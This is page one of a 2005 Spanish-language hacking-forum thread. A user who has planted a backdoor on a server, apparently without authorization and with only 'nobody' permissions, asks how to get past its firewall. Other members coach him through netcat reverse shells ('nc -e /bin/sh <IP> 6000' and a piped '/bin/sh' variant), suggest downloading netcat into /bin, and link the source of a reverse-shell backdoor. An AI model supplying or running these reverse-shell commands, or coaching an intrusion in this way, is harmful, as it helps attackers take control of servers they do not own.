elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
13 Octubre 2008, 05:52  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Linux/Unix (Moderador: berz3k)
| | | |-+  Saltarse "firewall"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Saltarse "firewall"  (Leído 1428 veces)
alb3rt0

Desconectado Desconectado

Mensajes: 218


Ver Perfil
Saltarse "firewall"
« en: 02 Septiembre 2005, 09:10 »

Hola, resulta que en un servidor subo una backdoor, para luego conectar por telnet, pero no puedo conectar, porq no se abre el puerto, supongo k sera porq usan firewall o estan detras de un router? :S que podria hacer para k la backdoor funcionase? Gracias
En línea
el-brujo
Adm
*****
Desconectado Desconectado

Mensajes: 14.044


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Saltarse "firewall"
« Respuesta #1 en: 02 Septiembre 2005, 17:31 »

conexión inversa.

Creo que se ha comentado 300 veces.
En línea

Give peace a chance
Colymore

Desconectado Desconectado

Mensajes: 420


uid=0(root) gid=0(root) grupos=0(root)


Ver Perfil WWW
Re: Saltarse "firewall"
« Respuesta #2 en: 02 Septiembre 2005, 17:41 »

Me parece que existe un backdoor que hace conexion inversa..buscalo, yo lo vi publicado por darkbicho
En línea

alb3rt0

Desconectado Desconectado

Mensajes: 218


Ver Perfil
Re: Saltarse "firewall"
« Respuesta #3 en: 02 Septiembre 2005, 18:00 »

me ayudariais muchisimo si me dierais el nombre del troyano, o informacion sobre esto, es muy importante :S gracias.
En línea
alb3rt0

Desconectado Desconectado

Mensajes: 218


Ver Perfil
Re: Saltarse "firewall"
« Respuesta #4 en: 02 Septiembre 2005, 18:17 »

El servidor tiene netcat lo k he hecho a sido poner esto en el servidor linux: nc miip 1337| /bin/sh | nc miip 31337 y luego en mi pc nc -vv -l -p 1337 y nc -vv -l -p 31337 pero se keda escuchando y no pasa nada, esto lo he leido aqui: http://foro.elhacker.net/index.php/topic,84461.0.html a ver si alguien me hecha un cable, gracias.
En línea
Cab Calloway
Colaborador

Desconectado Desconectado

Mensajes: 4.298



Ver Perfil
Re: Saltarse "firewall"
« Respuesta #5 en: 02 Septiembre 2005, 18:25 »

Haz lo siguiente, en el equipo atacante

Código:
nc -vv -l -p 6000

En el ekipo victima...
Código:
nc -e /bin/sh <tu IP> 6000

Entonces, obtendras una shell.

Saludos!
En línea

Max 400; caracteres restantes: 366
alb3rt0

Desconectado Desconectado

Mensajes: 218


Ver Perfil
Re: Saltarse "firewall"
« Respuesta #6 en: 02 Septiembre 2005, 18:54 »

al poner nc -e /bin/sh <tu IP> 6000 me dice k no es correcta la sintaxis, probe lo k dije antes solo con el puerto 25 y me salio esto: C:\Documents and Settings\yo\Escritorio\netcat>nc -l -n -v -p 25
listening on [any] 25 ...
connect to [ipatacante] from (UNKNOWN) [ipvictima] 51104

luego me salio el directorio otra vez, no me aparecio ninguna shell, tal vez sea porq tienen que ser las dos maquinas linux? porq la mia es win xp sp2, y el otro ekipo es un linux, es por eso?
En línea
Cab Calloway
Colaborador

Desconectado Desconectado

Mensajes: 4.298



Ver Perfil
Re: Saltarse "firewall"
« Respuesta #7 en: 02 Septiembre 2005, 19:45 »

Pues que raro, yo lo he probado antes, y me ha devuelto shell...  :-\

en la makina de linux:

Código:
nc -e /bin/sh <IP de tu makina de windows> 6000

Y en la makina de windows...

Código:
nc -vv -L -p 6000

Ten cuidadin, no vayas a poner los "<"     ">"  eso lo eliminas eh?

Primer, obviamente tienes k poner a la escucha tu makina de Windows, luego pones el comando ese en la makina de linux (a mi me ha funcionao linux-linux)

Si no te funciona dimelo, y pruebo a ver LINUX- Windows

Saludos!
En línea

Max 400; caracteres restantes: 366
alb3rt0

Desconectado Desconectado

Mensajes: 218


Ver Perfil
Re: Saltarse "firewall"
« Respuesta #8 en: 02 Septiembre 2005, 20:19 »

pongo el comando nc -vv -L -p 6000 en mi makina, y me sale esto:
C:\Documents and Settings\yo\Escritorio\netcat>nc -vv -L -p 6000
listening on [any] 6000 ...

(se supone k esta escuchando)

Luego voy a la makina linux y pongo esto otro: nc -e /bin/sh miip 6000

y me sale esto: nc -h for help

(supongo k el comando estara mal escrito por eso me sale eso)

al poner lo k dije antes de poner en mi makina esto: nc -l -n -v -p 25

(se me pone a escuchar como antes)

y pongo en la makina linux esto otro: nc miip 25 | /bin/sh

y me aparece en mi makina windows, esto:
C:\Documents and Settings\yo\Escritorio\netcat>nc -l -n -v -p 25
listening on [any] 25 ...
connect to [ipatacante] from (UNKNOWN) [ipvictima] 51104

(es de la unica forma en la k se a recibido una "respuesta" pero no me da shell, vuelve a mi directorio de win)

P.D: Tambien he probado estas dos formas de linux a linux, y nada, me sigue pasando lo mismo.
En línea
Cab Calloway
Colaborador

Desconectado Desconectado

Mensajes: 4.298



Ver Perfil
Re: Saltarse "firewall"
« Respuesta #9 en: 02 Septiembre 2005, 20:52 »

Lo acabo de probar y funciona...

Reinsala nc..

Saludos!
En línea

Max 400; caracteres restantes: 366
alb3rt0

Desconectado Desconectado

Mensajes: 218


Ver Perfil
Re: Saltarse "firewall"
« Respuesta #10 en: 02 Septiembre 2005, 21:35 »

[v1.10]
connect to somewhere:   nc [-options] hostname port [ports] ...
listen for inbound:   nc -l -p port [-options] [hostname] [port]
options:
   -g gateway      source-routing hop point, up to 8
   -G num         source-routing pointer: 4, 8, 12, ...
   -h         this cruft
   -i secs         delay interval for lines sent, ports scanned
   -l         listen mode, for inbound connects
   -n         numeric-only IP addresses, no DNS
   -o file         hex dump of traffic
   -p port         local port number
   -r         randomize local and remote ports
   -s addr         local source address
   -u         UDP mode
   -v         verbose [use twice to be more verbose]
   -w secs         timeout for connects and final net reads
   -z         zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]


Tal vez esk la opcion -e esta capada? (en el servidor linux tengo permisos nobody) no puedo reinstalar el netcat.
En línea
Cab Calloway
Colaborador

Desconectado Desconectado

Mensajes: 4.298



Ver Perfil
Re: Saltarse "firewall"
« Respuesta #11 en: 02 Septiembre 2005, 21:48 »

Pues bajatelo, y lo descomprimes en /bin

Saludos!
En línea

Max 400; caracteres restantes: 366
alb3rt0

Desconectado Desconectado

Mensajes: 218


Ver Perfil
Re: Saltarse "firewall"
« Respuesta #12 en: 02 Septiembre 2005, 22:20 »

No funciona el wget xD; tengo acceso al ftp, pero no creo k sirva de mucho, k mala suerte tengo :S, supongo k el troyano k decia Colymore, funcionara haciendo uso del netcat no?
En línea
Colymore

Desconectado Desconectado

Mensajes: 420


uid=0(root) gid=0(root) grupos=0(root)


Ver Perfil WWW
Re: Saltarse "firewall"
« Respuesta #13 en: 04 Septiembre 2005, 22:09 »

  Evil Shell  Backdoor 1.0.5     
 C - Código fuente de una  backdoor bind/reverse shell, por el puerto y host que quieras, con posibilidad de poner password - Lympex
http://lympex.sosvulnerable.net/resources/sources/Evil.Shell.Backdoor_1.0.5.c
Nose si te servira, yo de esto no se muxo, xDD
Un saludo
En línea

Colymore

Desconectado Desconectado

Mensajes: 420


uid=0(root) gid=0(root) grupos=0(root)


Ver Perfil WWW
Re: Saltarse "firewall"
« Respuesta #14 en: 04 Septiembre 2005, 22:13 »

E estado mriando de nuevo lo que estabas aciendo con el netcat, y..me parece que el problema es de tu PC porque si realizas conexion iinversa, cuando tu ejecutas el netcat en la makina victima funciona a la perfeccion e intenta acer conexion verdad??
O tal vez no permite conexiones salientes por X rango de puertos...son suposiciones, me parece que me ekivoko pero..nuse.saludos
En línea

Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC